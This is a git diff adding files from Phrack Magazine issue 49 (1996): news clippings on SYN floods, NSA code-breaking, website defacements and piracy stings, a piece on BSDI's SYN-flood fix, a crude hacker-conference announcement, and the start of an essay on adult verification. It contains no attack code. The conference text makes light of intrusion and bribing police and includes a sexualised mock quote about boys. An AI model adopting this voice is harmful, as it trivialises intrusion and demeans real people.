+        The Computer Emergency Response Team traces the attacks to two
+underground magazines, 2600 and Phrack, which recently published the code
+required to mount the assaults.
+
+[* Uh, wait.. above it said messages.. which sounds more like usenet,
+   not SYN Floods.. *]
+
+        "It's just mischief," said Ted Pinkowitz, president of Denver
+based e-central. "They're just doing it to prove that it can be done."
+        One local Internet service provider, who declined to be identified
+because he fears being targeted, said it goes beyond pranks.
+        "It's malicious," he said. "They're attacking the protocols that
+are the most basic glue of the Internet and it will take some subtle work
+to fix it. You can't just redesign the thing, because it's basic to the
+operation of the entire network."
+        The response team says tracking the source of an attack is
+difficult, but not impossible.
+        "We have received reports of attack origins being identified,"
+the advisory says.
+
+[=-------------------------------------------------------------------------=]
+
+title: Crypto Mission Creep
+author: Brock N. Meeks
+
+The Justice Department has, for the first time, publicly acknowledged
+using the code-breaking technologies of the National Security Agency, to
+help with domestic cases, a situation that strains legal boundaries of
+the agency.
+
+Deputy Attorney General Jamie Gorelick admitted in July, during an open
+hearing of the Senate's Governmental Affairs permanent subcommittee on
+investigations, that the Justice Department:  "Where, for example, we
+are having trouble decrypting information in a computer, and the
+expertise lies at the NSA, we have asked for technical assistance under
+our control."
+
+That revelation should have been a bombshell.  But like an Olympic
+diver, the revelation made hardly a ripple.
+
+By law the NSA is allowed to spy on foreign communications without
+warrant or congressional oversight.  Indeed, it is one of the most
+secretive agencies of the U.S. government, whose existence wasn't even
+publicly acknowledged until the mid-1960s.   However, it is forbidden to
+get involved in domestic affairs.
+
+During the hearing Sen. Sam Nunn (D-Ga.) asked Gorelick if the President
+had the "the constitutional authority to override statutes where the
+basic security of the country is at stake?"  He then laid out a
+scenario:  "Let's say a whole part of the country is, in effect,
+freezing to death in the middle of the winter [because a power grid has
+been destroyed] and you believe it's domestic source, but you can't
+trace it, because the FBI doesn't have the capability.  What do you do?"
+
+Gorelick replied that:  "Well, one thing you could do -- let me say
+this, one thing you could do is you could detail resources from the
+intelligence community to the law enforcement community.  That is, if
+it's under -- if it's -- if you're talking about a technological
+capability, we have done that."   And then she mentioned that the NSA
+had been called on to help crack some encrypted data.
+
+But no one caught the significance of Gorelick's' statements.  Instead,
+the press focused on another proposal she outlined, the creation of what
+amounts to a "Manhattan Project" to help thwart the threat of
+information warfare.  "What we need, then, is the equivalent of the
+'Manhattan Project' for infrastructure protection, a cooperative venture
+between the government and private sector to put our best minds together
+to come up with workable solutions to one of our most difficult
+challenges,'' Gorelick told Congress.  Just a day earlier, President
+Clinton had signed an executive order creating a blue-ribbon panel, made
+up of several agencies, including the Justice Department, the CIA, the
+Pentagon and the NSA and representatives of the private sector.
+
+Though the press missed the news that day; the intelligence agency
+shivered.  When I began investigating Gorelick's statement, all I got
+were muffled grumbling.   I called an NSA official at home for comments.
+"Oh shit," he said, and then silence.   "Can you elaborate a bit on that
+statement?" I asked, trying to stifle a chuckle.  "I think my comment
+says it all," he said and abruptly hung up the phone.
+
+Plumbing several sources within the FBI drew little more insight.   One
+source did acknowledge that the Bureau had used the NSA to crack some
+encrypted data "in a handful of instances," but he declined to
+elaborate.
+
+Was the Justice Department acting illegally by pulling the NSA into
+domestic work?   Gorelick was asked by Sen. Nunn if the FBI had the
+legal authority to call on the NSA to do code-breaking work.   "We have
+authority right now to ask for assistance where we think that there
+might be a threat to the national security," she replied.  But her
+answer was "soft."   She continued:  "If we know for certain that there
+is a -- that this is a non-national security criminal threat, the
+authority is much more questionable."  Questionable, yes, but averted?
+No.
+
+If Gorelick's answers seem coy, maybe it's because her public statements
+are at odds with one another.   A month or so before her congressional
+bombshell, she revealed the plans for the information age"Manhattan
+Project" in a speech.   In a story for Upside magazine, by
+old-line investigative reporter Lew Koch, where he broke the story,
+Gorelick whines in her speech about law enforcement going through "all
+that effort" to obtain warrants to search for evidence only to find a
+child pornography had computer files "encrypted with DES" that don't
+have a key held in escrow.  "Dead end for us," Gorelick says.  "Is this
+really the type of constraint we want? Unfortunately, this is not an
+imaginary scenario. The problem is real."
+
+All the while, Gorelick knew, as she would later admit to Congress, that
+the FBI had, in fact, called the NSA to help break codes.
+
+An intelligence industry insider said the NSA involvement is legal.
+"What makes it legal probably is that when [the NSA] does that work
+they're really subject to all the constraints that law enforcement is
+subject to."    This source went on to explain that if the FBI used any
+evidence obtained from the NSA's code-breaking work to make it's case in
+court, the defense attorney could, under oath, ask the NSA to "explain
+fully" how it managed to crack the codes.  "If I were advising NSA today
+I would say, there is a substantial risk that [a defense attorney] is
+going to make [the NSA] describe their methods," he said.  "Which means
+it's very difficult for the NSA to do its best stuff in criminal cases
+because of that risk."
+
+Some 20 years ago, Sen. Frank Church, then chairman of the Senate
+Intelligence Committee, warned of getting the NSA involved in domestic
+affairs, after investigating the agency for illegal acts.  He said the
+"potential to violate the privacy of Americans is unmatched by any other
+intelligence agency."   If the resources of the NSA were ever used
+domestically, "no American would have any privacy left . . . There would
+be no place to hide," he said.  "We must see to it that this agency and
+all agencies that possess this technology operate within the law and
+under proper supervision, so that we never cross over that abyss.  That
+is an abyss from which there is no return," he said.
+
+And yet, the Clinton Administration has already laid the groundwork for
+such "mission creep" to take place, with the forming of this "Manhattan
+Project."
+
+But if the Justice Department can tap the NSA at will -- a position of
+questionable legality that hasn't been fully aired in public debate --
+why play such hardball on the key escrow encryption issue?
+
+Simple answer:  Key escrow is an easier route.  As my intelligence
+community source pointed out, bringing the NSA into the mix causes
+problems when a case goes to court.   Better to have them work in the
+background, unseen and without oversight, the Administration feels. With
+key escrow in place, there are few legal issues to hurdle.
+
+In the meantime, the Justice Department has started the NSA down the
+road to crypto mission creep.  It could be a road of no return.
+
+Meeks out...
+
+[=-------------------------------------------------------------------------=]
+
+title: Hacker posts nudes on court's Web pages
+author: Rob Chepak
+source: The Tampa Tribune
+
+
+       TALLAHASSEE - The Internet home of the Florida Supreme Court isn't
+the kind of place you'd expect to find nudity.
+       But that's what happened Wednesday morning when a judge in
+Tallahassee found a pornographic photo while he was looking for the latest
+legal news.
+       A computer hacker broke into the high court's cyberhome, placing at
+least three pornographic photos and a stream of obscenities on its Web pages.
+       ``All I looked at was the one picture, then I checked with the
+court,'' said a surprised Charles Kahn Jr., a 1st District Court of Appeal
+judge.
+       The altered pages were immediately turned off. The Florida Department
+of Law Enforcement is investigating the incident and the U.S. Justice
+Department has been contacted. The hacker didn't tamper with any official
+records, court officials said.
+       ``We've got three photos and we're looking for more,'' said Craig
+Waters, executive assistant to Chief Justice Gerald Kogan. The culprit
+``could be anyone from someone in the building to the other side of
+the world.''
+
+[* I bet they are looking for more.. *]
+
+       The Florida Court's Web site is used to post information about court
+opinions, state law and legal aid. Thousands of people, including children,
+use the court system's more than 500 Internet pages each month, Waters said.
+       The court and other state agencies usually keep their most vital
+information on separate computers that can't be accessed on the Internet.
+       Officials aren't sure how the culprit broke in, and FDLE had no
+suspects Thursday afternoon. But court officials long have suspected their
+Web site could be a target for hackers armed with the computer equipment to
+impose photos on the Web. The Florida Supreme Court became the first state
+Supreme Court in the nation to create its own Internet pages two years ago.
+       While the episode sounds like a well-crafted high school prank,
+computer hackers are becoming a big problem for government agencies, which
+increasingly are finding themselves the victims of criminal tampering on
+the Internet. In August, someone placed swastikas and topless pictures of
+a TV star on the U.S.
+       Department of Justice's home page. The Central Intelligence Agency
+has been victimized, too.
+       ``It's certainly a common problem,'' said P.J. Ponder, a lawyer for
+the Information Resource Commission, which coordinates the state
+government's computer networks. However, there are no statistics on
+incidences of tampering with state computers.
+       The best way for anyone to minimize damage by computer hackers is by
+leaving vital information off the Internet, said Douglas Smith, a consultant
+for the resource commission. Most state agencies follow that advice, he added.
+       ``I think you have to weigh the value of security vs. the value of
+the information you keep there,'' he said.
+       Court officials would not reveal details of the sexually explicit
+photos Thursday, but Liz Hirst, an FDLE spokeswoman, said none were of
+children.
+       Penalties for computer tampering include a $5,000 fine and five
+years in jail, but the punishment is much higher if it involves child
+pornography, she said.
+       Without a clear motive or obvious physical evidence, FDLE
+investigators, who also investigate child pornography on the Internet,
+hope to retrace the culprit's steps in cyberspace. However, Ponder said
+cases of Internet tampering are ``very difficult to solve.''
+       Thursday, the state's top legal minds, who are used to handing out
+justice, seemed unaccustomed to being cast as victims.
+       ``No damage was done,'' Kogan said in a statement. ``But this
+episode did send a message that there was a flaw in our security that we
+now are fixing.''
+
+[* I tell you (and other agencies) I do security consulting!! Please?! *]
+
+[=-------------------------------------------------------------------------=]
+
+title: Hacking Into Piracy
+source: The Telegraph
+
+22nd October 1996
+
+Computer crime investigators are using the techniques of their
+adversaries to crack down on illegally traded software. Michael
+McCormack reports.
+
+The adage "Set a thief to catch a thief" is being updated for the
+electronic age as online investigators use hackers' techniques to fight
+a thriving trade in counterfeit and pirate software that is reckoned to
+cost British program-makers more than 3 billion a year.
+
+"Jason", a computer crime investigator employed by Novell to shut down
+bulletin boards that trade pirate copies of its software, leads a
+confusing double life. First he spends weeks in his office, surfing the
+Internet and wheedling secrets from hackers around Europe; then he
+compiles dossiers of evidence on the system operators who deal in Novell
+wares, flies to their bases, presents the local police with his reports,
+and accompanies them on the inevitable raid.
+
+"Every day I'm on IRC [the Internet's chat lines, where information can
+be exchanged quickly and relatively anonymously] looking for tips on new
+bulletin boards that might have Novell products on them," he says.
+
+"Our policy has been to go country by country through Europe and try to
+take down the biggest boards in each one"
+
+"It tends to be the biggest boards that have our products, and those can
+be difficult to get on to. The operators have invested a lot of time and
+cash in setting them up and they're sometimes quite careful who they'll
+let on. I often start by joining dozens of little boards in the area to
+get myself a good reputation, which I can use as a reference to get on
+to the big board.
+
+"Our policy has been to go country by country through Europe and try to
+take down the biggest boards in each one. That has a chilling effect on
+the other operators. They think, 'If he could get caught, I'm doomed.'
+Within days of us taking down a big board, Novell products disappear off
+the smaller ones."
+
+Once Jason gains entry to a big board, the game begins in earnest:
+"Bulletin boards work on the principle that if you want to take
+something off, you first have to put something in. Obviously I can't put
+in Novell's products, or any other company's; instead, we use a program
+we wrote ourselves. It's huge, and it has an impressive front end full
+of colour screen indicators and menus. It doesn't actually do anything
+but it looks impressive and it lets you start pulling things off the
+site."
+
+Once Jason finds company products on a board, he makes a video of
+himself logging on and retrieving a copy of the software.
+
+[* Talk about freako bizarre narc fetishes.. *]
+
+Bulletin boards often have restricted areas closed to all but a few
+trusted members, and these are where the most illegal products - such as
+expensive business or word-processing packages copied from beta releases
+or pirate disks - are kept. Penetrating these areas takes a skill
+learned from the hackers. "It's called social engineering," says Jason.
+"It just means chatting up the operator until he decides to trust you
+with the goodies."
+
+Once Jason finds company products on a board, he makes a video of
+himself logging on and retrieving a copy of the software. Then it's on
+to a plane to go and lodge a complaint with the local police.
+
+He is helped by Simon Swale, a fellow Novell investigator and former
+Metropolitan Police detective who uses his experience of international
+police procedures and culture to ensure that foreign forces get all the
+technical help they need.
+
+In the past six months, Jason's investigations have shut down seven
+bulletin boards across Europe, recovering software valued at more than
+500,000. The company reckons the closed boards would have cost it more
+than 2.5 million in lost sales over the next year.
+
+Jason has vivid memories of the early-morning raid on the operator's
+house.
+
+One of the Jason's biggest successes came earlier this year in Antwerp,
+when he guided Belgian police to the Genesis bulletin board, which held
+more than 45,000 worth of Novell products and a slew of other pirate
+software. Jason has vivid memories of the early-morning raid on the
+operator's house: "The first thing he said was, 'I have nothing illegal
+on my system.' So I set up my laptop and mobile and dialled into it from
+his kitchen. All the police watched as I tapped into my keyboard and
+everything popped up on his screen across the room. I went straight
+in to the Novell stuff and he said, 'Okay, maybe I have a little'."
+
+The system operator, Jean-Louis Piret, reached a six-figure out-of-court
+settlement with Novell. More importantly for the company, its products
+have all but disappeared from Belgium's boards in the wake of the raid.
+
+There are, however, many more fish to fry. Jason already has another
+three raids lined up for autumn . . .
+
+[=-------------------------------------------------------------------------=]
+
+title: Revealing Intel's Secrets
+
+The Intel's Secrets site may not be around for long if Intel has anything
+to say about it. The site provides a look at details, flaws, and programming
+tips that the giant chip manufacturer would rather not share with the general
+public. One particular page exposes some unflattering clitches of the P6
+chip and a bug in the Intel486 chip. The site even has two separate hit
+counters: one for the average visitor, and one that counts the number of
+times Intel has stopped by.  
+
+[=-------------------------------------------------------------------------=]
+
+title: Internet Boom Puts Home PCs At Risk Of Hackers
+author: Nick Nuttall
+source: The London Times
+
+18th October 1996
+
+Home computers, which carry everything from private banking details to
+love letters, are becoming vulnerable to hackers as more households
+connect to the Internet. 
+
+The boom in electronic services is making the home PC as open to attack
+as company and government systems, a survey of hackers has disclosed.
+The Internet is also helping hackers to become more skilful as they
+exchange tips and computer programs around the globe. 
+
+[* Survey of hackers?! Bullshit. *]
+
+A spokesman for Kinross and Render, which carried out the survey for
+Computacenter, said: "Breaking into home computers is now increasingly
+possible and of great interest to hackers. It may be a famous person's
+computer, like Tony Blair's or a sports personality. Equally it could be
+yours or my computer carrying personal details which they could use for
+blackmailing." 
+
+Passwords remain easy to break despite warnings about intrusion.
+Companies and individuals frequently use simple name passwords such as
+Hill for Damon Hill or Blair for the Labour leader. Hackers also said
+that many users had failed to replace the manufacturer's password with
+their own. 
+
+Hackers often use programs, downloaded from the Internet, which will
+automatically generate thousands of likely passwords. These are called
+Crackers and have names such as Satan or Death.
+
+[* Satan? Death? Ahhhh! *]
+
+John Perkins, of the National Computing Centre in Manchester, said
+yesterday: "The linking of company and now home computers to the
+global networks is making an expanding market for the hackers." The
+Computacenter survey was based on interviews with more than 130
+hackers, supplemented by interviews over the Internet. The average
+hacker is 23, male and a university student. At least one of those
+questioned began hacking ten years ago, when he was eight. 
+
+[* No offense to anyone out there, but how in the hell could they
+   validate any claims in a survey like that? And especially with
+   that amount? *]
+
+Most said it was getting easier, rather than harder, to break in and
+many hackers would relish tighter computer security because this would
+increase the challenge. Existing laws are held in contempt and almost 80
+per cent said tougher laws and more prosecutions would not be a
+deterrent. Eighty-five per cent of those questioned had never been
+caught.
+
+Most said the attraction of hacking lay in the challenge, but a hard
+core were keen to sabotage computer files and cause chaos, while others
+hoped to commit fraud.
+
+[* Excuse me while I vomit. *]
+
+[=-------------------------------------------------------------------------=]
+
+title: Computer hacker Mitnick pleads innocent
+
+September 30, 1996
+
+LOS ANGELES (AP) -- The notorious computer hacker Kevin Mitnick pleaded
+innocent Monday to charges he mounted a multimillion-dollar crime wave
+in cyberspace during 2 1/2 years as a fugitive.
+
+Mitnick, 33, held without bail on a fraud conviction, told the judge
+not to bother reading the indictment, which includes 25 new counts of
+computer and wire fraud, possessing unlawful access devices, damaging
+computers and intercepting electronic messages.
+
+"Not guilty," Mitnick said.  His indictment, handed up Friday by a
+federal grand jury, follows an investigation by a national task force
+of FBI, NASA and federal prosecutors with high-tech expertise.
+
+It charges Mitnick with using stolen computer passwords, damaging
+University of Southern California computers and stealing software
+valued at millions of dollars from technology companies, including
+Novell, Motorola, Nokia, Fujitsu and NEC.
+
+                           ...........
+
+Mitnick pleaded guilty in April to a North Carolina fraud charge of
+using 15 stolen phone numbers to dial into computer databases.
+Prosecutors then dropped 22 other fraud charges but warned that new
+charges could follow.
+
+Mitnick also admitted violating probation for a 1988 conviction in Los
+Angeles where he served a year in jail for breaking into computers at
+Digital Equipment Corp. At 16, he served six months in a youth center
+for stealing computer manuals from a Pacific Bell switching center.
+
+Mitnick also got a new lawyer Monday, Donald C. Randolph, who
+represented Charles Keating Jr.'s top aide, Judy J. Wischer, in the
+Lincoln Savings swindle.
+
+[=-------------------------------------------------------------------------=]
+
+title: Hackers Destroy Evidence of Gulf War Chemical/Biological Weapons
+source: WesNet News
+
+Saturday, Nov. 2, 5:00 p.m.
+
+WASHINGTON DC -- Hackers broke into a Web site (http://insigniausa.com)
+containing suppressed evidence of Gulf War chemical and biological weapons
+Friday, erasing all files.
+
+"Someone hacked in Friday around 4 p.m. and completely trashed our
+machine," said Kenneth Weaver, webmaster of W3 Concepts, Inc.
+(http://ns.w3concepts.com) of Poolesville, Maryland (a suburb of Washington
+D.C.), which houses the site. 
+
+The Web site contained recently-released supressed Department of Defense
+documents exposing biological and chemical warfare materials that U.S.
+companies allegedly provided to Iraq before the war. 
+
+Bruce Klett, publisher, Insignia Publishing said they are now restoring the
+files. "We plan to be operational again Saturday evening or Sunday," he
+said. "We encourage anyone to copy these files and distribute them." There
+are over 300 files, requiring 50 MB of disk space.
+
+The Department of Defense has its own version of these files on its
+Gulflink Web site (http://www.dtic.dla.mil/gulflink/).
+
+Insignia plans to publish Gassed In the Gulf, a book on the government's
+coverup by former CIA analyst Patrick Eddington, in six to eight weeks,
+Klett added.
+
+Hackers also brought down SNETNEWS and IUFO, Internet mailing lists
+covering conspiracies and UFOs, on Oct. 25, according to list administrator
+Steve Wingate. He plans to move the lists to another Internet service
+provider be be back in operation soon.
+
+"We've seen this happen regularly when we get too close to sensitive
+subjects," Wingate said. "The election is Tuesday. This is a factor."
+
+He also said a "quiet" helicopter buzzed and illuminated his Marin County
+house and car Thursday night for several minutes.
+
+[=-------------------------------------------------------------------------=]
+
+title: Criminals Slip Through The Net
+source: The Telegraph, London
+
+5th November 1996
+
+Britain is way behind in the fight against computer crime and it's time
+to take it seriously, reports Michael McCormack
+
+
+BRITAIN'S police forces are lagging behind the rest of the world in
+combating computer crime, according to one of the country's most
+experienced computer investigators - who has just returned to walking
+the beat.
+
+Police Constable John Thackray, of the South Yorkshire Police, reached
+this grim conclusion after a three-month tour of the world's leading
+computer crime units, sponsored by the Winston Churchill Memorial Trust.
+
+All of the five countries he studied, he says, are putting Britain's
+efforts against electronic crime to shame.
+
+"The level of education and understanding of computer crime is far more
+advanced outside Britain," said Thackray.
+
+"Here, police forces are shying away from even attempting to investigate
+computer crimes. You see experienced detectives who lose all interest in
+pursuing cases where there are computers involved.
+
+"We know that computer crime, particularly software piracy, is closely
+connected with organised crime - they like the high profits and the low
+risk - but those connections aren't followed up."
+
+He adds:"We are far behind our own criminals on these matters. We only
+catch them when they get complacent and keep using old technology and
+old methods. If they simply keep up with current technology, they are so
+far ahead they are safe." Thackray was one of the officers responsible
+for closing down one of the largest pirate bulletin boards in the
+country, estimated to have stolen software worth thousands last year and
+has assisted officers from other forces in several similar cases.
+Pirates recently named a new offering of bootleg software "Thackray1 and
+2" in his honour.
+
+He has seen how seriously such crimes are taken by police forces abroad:
+"In America there are specialist units in every state and a similar
+system is being put in place in Australia. There's nothing nearly as
+comprehensive in in Britain.
+
+"We have the Computer Crimes Unit at Scotland Yard and a small forensic
+team at Greater Manchester, but they're both badly under-resourced and
+there's little interest in, or support for, investigating computer
+crimes in other forces.
+
+"Our officers must get a better education, to start with, on what
+computer crime is, how it works and who is being hurt by it. We need to
+bury the impression that this is a victimless crime with no serious
+consequences."
+
+Thackray is preparing a report on his impressions of anti-crime
+initiatives in other countries and what must be done in Britain to equal
+them. "In my view, we need specially detailed officers who are educated
+in computer crime issues.
+
+"We also need to become much more pro-active in our approach. It's not
+good enough to sit back and wait for the complaints."
+
+But perhaps symptomatic of Britain's efforts is the way Thackray's
+valuable experience is being used. He is putting away his laptop and
+getting out his boots.
+
+"I'm now being moved back into uniform. The two year experience I have
+gained in investigating these matters is not going to be used to its
+full potential."
+
+"We pride ourselves on being an effective police service in Britain, and
+other countries look up to us. But when it comes to computer crime, we
+have to start following their lead."
+
+-EOF
diff --git a/phrack49/2.txt b/phrack49/2.txt
new file mode 100644
index 0000000..12cccd8
--- /dev/null
+++ b/phrack49/2.txt
@@ -0,0 +1,99 @@
+                             .oO Phrack Magazine Oo.
+
+                   	 Volume Seven, Issue Forty-Nine
+	   	 		   
+  				  File 2 of 16
+
+                                Phrack Loopback
+
+-----------------------------------------------------------------------------
+[The Netly News]
+
+     September 30, 1996
+
+     Today, Berkeley Software Design, Inc. is expected to publicly release 
+a near-perfect solution to the "Denial of Service," or SYN flooding attacks,
+that have been plaguing the Net for the past three weeks. The fix, dubbed
+the SYN cache, does not replace the need for router filtering, but it is 
+an easy-to-implement prophylaxis for most attacks.
+	
+	"It may even be overkill," says Alexis Rosen, the owner of Public 
+Access Networks. The attack on his service two weeks ago first catapulted 
+the hack into public consciousness.
+
+	The SYN attack, originally published by Daemon9 in Phrack, has 
+affected at least three service providers since it was published last month. 
+The attack floods an ISP's server with bogus, randomly generated connection
+requests. Unable to bear the pressure, servers grind to a halt.
+
+	The new code, which should take just 30 minutes for a service provider 
+to install, would keep the bogus addresses out of the main queue by saving two 
+key pieces of information in a separate area of the machine, implementing
+communication only when the connection has been verified.  Rosen, a master of 
+techno metaphor, compares it to a customs check. When you seek entrance to a 
+server, you are asked for two small pieces of identification. The server then
+sends a communique back to your machine and establishes that you are a real 
+person. Once your identity is established, the server grabs the two missing 
+pieces of identification and puts you into the queue for a connection. If 
+valid identification is not established, you never reach the queue and the 
+two small pieces of identification are flushed from the system.
+
+	The entire process takes microseconds to complete and uses just a few 
+bytes of memory. "Right now one of these guys could be on the end of a 300-baud
+modem and shut you down," says Doug Urner, a spokesman for BSDI. "With these
+fixes, they just won't matter." still, Urner stresses that the solution does 
+not reduce the need for service providers to filter IP addresses at the router.
+
+	Indeed, if an attacker were using a T1 to send thousands of requests per
+second, even the BSDI solution would be taxed. For that reason, the developers 
+put in an added layer of protection to their code that would randomly drop 
+connections during an overload. That way at least some valid users would 
+be able to get through, albeit slowly.
+
+	There have been a number of proposed solutions based on the random-drop 
+theory. Even Daemon9 came up with a solution that looks for any common 
+characteristics in the attack and learns to drop that set of addresses.  For 
+example, most SYN attacks have a tempo -- packets are often sent in 
+five-millisecond intervals -- When a server senses flooding it looks for these 
+common characteristics and decides to drop that set of requests. Some valid 
+users would be dropped in the process, but the server would have effectively 
+saved itself from a total lockup.
+
+	Phrack editor Daemon9 defends his act of publishing the code for the 
+attack as a necessary evil. "If I just put out a white paper, no one is 
+going to look at this, no one is going to fix this hole," he told The 
+Netly News. "You have to break some eggs, I guess.
+
+	To his credit, Daemon9 actually included measures in his code that made
+it difficult for any anklebiting hacker to run. Essential bits of information 
+required to enable the SYN attack code could be learned only from reading 
+the entire whitepaper he wrote describing the attack. Also, anyone wanting to 
+run the hack would have to set up a server in order to generate the IP 
+addresses.  "My line of thinking is that if you know how to set a Linux up 
+and you're enough in computers, you'll have enough respect not to do this," 
+Daemon9 says. He adds, "I did not foresee such a large response to this."
+
+	Daemon9 also warns that there are other, similar protocols that can be 
+abused and that until there is a new generation of TCP/IP the Net will be open 
+to abuse. He explained a devastating attack similar to SYN called ICMP Echo 
+Flood.  The attack sends "ping" requests to a remote machine hundreds of times 
+per second until the machine is flooded.
+
+	"Don't get me wrong," says Daemon9. "I love the Net. It's my bread and 
+butter, my backyard. But now there are too many people on it with no concern 
+for security. The CIA and DOJ attacks were waiting to happen. These holes were
+pathetically well-known."
+
+                                --By Noah Robischon
+
+[ Hmm.  I thought quotation marks were indicative of verbatim quotes.  Not
+in this case...  It's funny.  You talk to these guys for hours, you *think*
+you've pounded the subject matter into their brains well enough for them to 
+*at least* quote you properly... -d9 ]
+
+[ Ok.  Loopback was weak this time.  We had no mail.  We need mail.  Send us 
+mail! ]
+
+
+			        ----<>----
+
diff --git a/phrack49/3.txt b/phrack49/3.txt
new file mode 100644
index 0000000..d2869c5
--- /dev/null
+++ b/phrack49/3.txt
@@ -0,0 +1,1353 @@
+                        .oO Phrack Magazine Oo.
+
+              	     Volume Seven, Issue Forty-Nine
+			
+			      File 3 of 16
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+------------------------------------------------------------------------------
+
+     CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96
+
+                  Tengo que hable con mi abogado.
+
+     ----------------------------------------------------------------
+
+What : A computer/telephony/security conference. (show this part to your 
+       boss.)
+
+Where: Fort Brown Hotel, Brownsville Texas. 
+
+When : 28 & 29 December, 1996
+
+Who  : The usual gang of cretins.
+
+Why  : It's winter, and it is 12 degrees outside.  The dumpsters are frozen
+       shut, and there are icicles on the payphones.  Brownsville is at the
+       Southern-most tip of Texas, right up against...Mexico.  Yes, Mexico,
+       land of cheap cerveza, four-dollar strippers, and liberal drinking
+       laws.  Mexico, where you too can own your very own Federal law
+       enforcement official for a fistful of pesos.
+
+     ----------------------------------------------------------------
+                              
+                              Speakers
+
+Anybody wishing to speak at CuervoCon should send 
+e-mail to the address at the bottom of this announcement.
+Currently the list includes:
+u4ea (by teleconfrence)
+Major
+ReDragon
+Caffiend (about her Breasts)
+daemon9 (about his Breasts)
+
+     ----------------------------------------------------------------
+
+                               Events
+
+"How Much Can You Drink?"
+"Fool The Lamer"
+"Hack The Stripper"
+"Hack The Web Server"
+"sk00l"
+"Ouija Board Hacking"
+
+...as well as a variety of Technical Presentations.
+
+
+     ----------------------------------------------------------------
+
+
+                         General Information
+
+
+The Fort Brown Hotel will have available to us, 125 rooms at the holiday in @ 
+$55 a room, and $75 rooms at the ramada @ $45 each.  The Fort Brown was 
+previously an actual fort when it was closed down by Uncle Sam.  It became one
+large hotel until it was recently purchased and split into the Holiday Inn and
+the Ramada.  The Fort Brown was chosen because it is across the street from 
+the bridge to Mexico.  You can call the Fort Brown Ramada at: 
+
+	210-541-2921
+
+You can call the Fort Brown Holiday Inn at:
+
+	210-546-2201
+
+Call for reservations, make sure to tell them your with CuervoCon.
+
+Friday and Saturday the con will be in the 'Calvary' room.  While Sunday we 
+have the 'Fortress Room' where all the big speakers will be.  Friday and 
+Saturday we will have a few speakers and activities.  Friday Night mainly, 
+so we can have people arrive on time.  We hope to have the con room open 24 
+hours a day.
+
+Brownsville is right on the Mexican border, adjacent to the Mexican town
+Matamoris.  The Gulf of Mexico is 25 miles away.  Brownsville has a population
+just over 100,000.  The police force includes 175 officers, and a wide variety
+of federal law enforcement agencies have a strong presence there as well.
+The climate is semi-tropical, and the RBOC is SouthWestern Bell.
+
+Matamoris is the other half of brownsville.  Home of over 1/2 a million 
+people, it is known since the early 1900's as a pit of sin.  The federale's 
+are not to be fucked with and it is serviced by TelMex.  It is known for its 
+bars, strip clubs and mexican food.  Matamoros also has an airport incase 
+you live in Mexico and care to go, via aeromexico.
+
+Directions:
+In Texas Driving - Go anyway you can to get to US 77 South. Take 77 South 
+till it ends in Brownsville. From there you will turn right on International.
+Proceed all the way down international, right before the bridge, turn left.
+The Fort Brown will be on the left.
+
+For those flying in - We are going to try to have a shuttle going. Also just
+tell the cab driver, Fort Brown.
+
+The Con Registration Fee, aka the pay it when you walk in our we will beat you
+up, is only 10$ and an additional 5$ for the 'I paid for eliteness sticker' 
+which will let you into the special events, such as hack the stripper.
+
+     ----------------------------------------------------------------
+
+                       Celebrity Endorsements
+
+
+
+Here's what last years participants had to say about CuervoCon:
+
+"I attended the CuervoCon 95.  I found many people there who, fearing a
+ sunburn, wanted to buy my t-shirts!" -ErikB
+
+"I tried to attend, but was thwarted by "No Admittance to The Public" 
+ sign.  I feel as though I missed the event of the year." - The Public
+
+"mmmm...look at all the little Mexican boys..." -Netta Gilboa
+
+"Wow!  CuervoCon 95 was more fun that spilling my guts to the feds!" - 
+ Panther Modern
+
+"CuervoCon is our favorite annual event.  We know we can give 
+ security a day of rest, because you people are all too drunk to
+ give us any trouble..." - AT&T
+
+"No moleste, por favor." - TeleMex
+
+Don't miss it!
+
+     ----------------------------------------------------------------
+
+
+Have you ever hacked a machine in your hometown from a foreign
+country?
+
+Have you ever had to convert dollars into pesos to get your bribe right?
+
+Have you ever spent time in a foreign prison, where your "rights as an 
+American" just don't apply?
+
+Have you ever been taken down for soemthing that wasn't even illegal 
+half an hour ago?
+
+YOU WILL!  And the con that will bring it to you?
+
+CUERVOCON 96
+
+     ----------------------------------------------------------------
+
+     CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 
+                            brought to you by
+     - S.o.B. - TNo - PLA - Phrack - The Guild - F.U.C.K. - SotMESC - 
+
+
+                          Contact Information
+
+info@cuervocon.org
+
+www.cuervocon.org - Look here for updates.
+
+Voice mail system coming up soon.
+
+     ----------------------------------------------------------------
+
+
+                                ----<>----
+
+
+*** The truth behind the Adult Verification Services 
+
+	     ('porno' will set you free)
+
+*** By your passively skeptical author, t3.
+
+*** 10.30.96
+
+
+        Let's speak for a minute about 'porno'.  'Porno' has saturated the 
+Net to a level in which it's difficult *not* to see it, regardless if 
+you're looking for it.  It can be found on the largest web site and the 
+smallest ftp site.  It can be found on Usenet, it can be found with any 
+one of numerous search engines.  Let's not delude ourselves, porno is 
+*everywhere* and anyone with the motor skills to click a mouse can have access 
+to it.
+
+About a year ago a concept came along called 'Adult Verification'.  This first
+started out by people writing crude cgi scripts that would query every person
+as to their age.  'Are you 18' it would say, and even a sexually aware 9-year
+old would know to say 'yay' to this.
+
+Soon thereafter, someone topped this 4-line piece of code by writing a login 
+interface, most likely it was incorporated into Netscape or some other, less
+worthy browser.  This program made use of the actual browser to authenticate   
+users.  Of course one needed a login and password, of which had to be manually
+added after ample proof of age was received.  If one merely wanted to 
+cover one's ass, this would not be a logical solution.
+
+This all occurred during which the CDA (Communications Decency Act) had 
+actually existed.  On June 7, 1995, the CDA was passed through the Senate 
+to the President, signed, and made a law:
+
+(1) in the heading by striking `Broadcasting obscene
+              language' and inserting `Utterance of indecent or profane
+              language by radio communication; transmission to minor of
+              indecent material from remote computer facility, electronic
+              communications service, or electronic bulletin board service';
+
+et al...Now it was illegal to transmit 'indecent material' on the 
+Internet.  If this were to actually be adhered to, the Net would shrink 
+so drastically that the current topology would last ten years before 
+needing an upgrade.
+
+Is was soon apparent that this act was not going to fly.  Groups like the 
+EFF and the ACLU suddenly became extremely busy.  Companies such as Apple 
+and Microsoft challenged the constitutionality of such a law and took 
+this directly to court.  It was also apparent that the transmission of 
